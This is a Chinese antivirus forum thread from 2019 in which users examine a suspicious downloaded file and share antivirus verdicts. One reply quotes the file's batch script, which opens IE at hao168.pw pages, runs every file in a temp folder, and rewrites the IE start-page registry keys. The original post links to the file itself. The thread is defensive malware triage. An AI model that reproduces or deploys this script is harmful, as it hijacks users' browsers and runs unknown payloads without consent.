搜索
查看: 812|回复: 13
收起左侧

[可疑文件] 这个是什么文件

[复制链接]
蓝蓝的天空
发表于 2019-7-29 16:20:26 | 显示全部楼层 |阅读模式
以前在微盘下载的  都是什么啊  没打开

https://www.lanzous.com/i57rc8j
ELOHIM
发表于 2019-7-29 16:21:59 | 显示全部楼层
Windows Defender SmartScreen 阻止此下载。
静影沉璧
发表于 2019-7-29 16:25:20 | 显示全部楼层
看上去很可疑




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a233
发表于 2019-7-29 16:26:12 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
c/mm
发表于 2019-7-29 18:09:58 | 显示全部楼层
Dr.web


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
暗_黑
发表于 2019-7-29 18:16:50 | 显示全部楼层
本帖最后由 暗_黑 于 2019-7-29 18:23 编辑

卡巴信任,不过我认为可能是流氓,ps:双击了一下,像是捆绑软件的,然后桌面出现了这个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
温馨小屋
发表于 2019-7-29 19:59:10 | 显示全部楼层
暗_黑 发表于 2019-7-29 18:16
卡巴信任,不过我认为可能是流氓,ps:双击了一下,像是捆绑软件的,然后桌面出现了这个

你看的这是cmd,肯定是信任,这个快捷方式利用cmd运行temp里的病毒,不要被骗了
温馨小屋
发表于 2019-7-29 20:01:52 | 显示全部楼层
本帖最后由 温馨小屋 于 2019-7-29 20:03 编辑

BD 双击miss




就是纯命令行安装。。。
@echo off
start iexplore.exe http://hao168.pw/tj.html?kj-kd_20131101
choice /t 1 /d y /n >nul
start iexplore.exe http://hao168.pw/123.php
for /f "delims=" %%a in ('dir temp\  /s /b /a-d^|findstr /v /i "阅读器.bat"') do (start "" "%%a")
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "http://hao168.pw/123.php" /f >nul 2>nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d "http://hao168.pw/123.php" /f >nul 2>nul
exit

温馨小屋
发表于 2019-7-29 20:10:44 | 显示全部楼层
卡巴双击miss
www-tekeze
发表于 2019-7-29 22:14:06 | 显示全部楼层

智量报两个PUP一个Adware 。。。火绒不报,看看明天是否入库。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-24 04:31 , Processed in 0.048109 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表